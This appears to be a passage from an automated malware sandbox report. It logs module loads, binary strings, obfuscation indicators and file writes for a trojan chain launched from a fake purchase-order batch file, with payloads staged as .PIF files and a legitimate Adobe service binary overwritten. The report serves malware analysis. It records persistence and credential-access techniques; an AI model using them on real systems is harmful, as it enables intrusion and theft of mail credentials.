Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: version.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: url.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: dbghelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: TrojanAIbot.exe.lnk.14.dr LNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat Static file information: File size 1393123 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.1474717040.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.000000002212F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.00000000220FE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.00000000028C9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 4.2.x.exe.2e40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: lxsyrsiW.pif.4.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5894C LoadLibraryW,GetProcAddress,FreeLibrary, 4_2_02E5894C
Source: armsvc.exe.12.dr Static PE information: real checksum: 0x32318 should be: 0x140311
Source: neworigin.exe.12.dr Static PE information: real checksum: 0x0 should be: 0x480db
Source: x.exe.3.dr Static PE information: real checksum: 0x0 should be: 0x15c6e6
Source: server_BTC.exe.12.dr Static PE information: real checksum: 0x0 should be: 0x42478
Source: lxsyrsiW.pif.4.dr Static PE information: real checksum: 0x0 should be: 0x1768a
Source: Wisrysxl.PIF.10.dr Static PE information: real checksum: 0x0 should be: 0x15c6e6
Source: TrojanAIbot.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x42478
Source: alpha.pif.8.dr Static PE information: section name: .didat
Source: armsvc.exe.12.dr Static PE information: section name: .didat
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E6D2FC push 02E6D367h; ret 4_2_02E6D35F
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E463AE push 02E4640Bh; ret 4_2_02E46403
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E463B0 push 02E4640Bh; ret 4_2_02E46403
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E6C378 push 02E6C56Eh; ret 4_2_02E6C566
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4C349 push 8B02E4C1h; ret 4_2_02E4C34E
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4332C push eax; ret 4_2_02E43368
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E6D0AC push 02E6D125h; ret 4_2_02E6D11D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5306C push 02E530B9h; ret 4_2_02E530B1
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5306B push 02E530B9h; ret 4_2_02E530B1
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E6D1F8 push 02E6D288h; ret 4_2_02E6D280
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E6D144 push 02E6D1ECh; ret 4_2_02E6D1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5F108 push ecx; mov dword ptr [esp], edx 4_2_02E5F10D
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E46784 push 02E467C6h; ret 4_2_02E467BE
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E46782 push 02E467C6h; ret 4_2_02E467BE
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4D5A0 push 02E4D5CCh; ret 4_2_02E4D5C4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4C56C push ecx; mov dword ptr [esp], edx 4_2_02E4C571
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E6C570 push 02E6C56Eh; ret 4_2_02E6C566
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5AAE0 push 02E5AB18h; ret 4_2_02E5AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E58AD8 push 02E58B10h; ret 4_2_02E58B08
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4CA4E push 02E4CD72h; ret 4_2_02E4CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E4CBEC push 02E4CD72h; ret 4_2_02E4CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5886C push 02E588AEh; ret 4_2_02E588A6
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02EB4850 push eax; ret 4_2_02EB4920
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E56946 push 02E569F3h; ret 4_2_02E569EB
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E56948 push 02E569F3h; ret 4_2_02E569EB
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5790C push 02E57989h; ret 4_2_02E57981
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E55E7C push ecx; mov dword ptr [esp], edx 4_2_02E55E7E
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E52F60 push 02E52FD6h; ret 4_2_02E52FCE
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_01210C6D push edi; retf 13_2_01210C7A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_01210C45 push ebx; retf 13_2_01210C52
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0499632D push eax; ret 16_2_04996341

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Wisrysxl.PIF
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
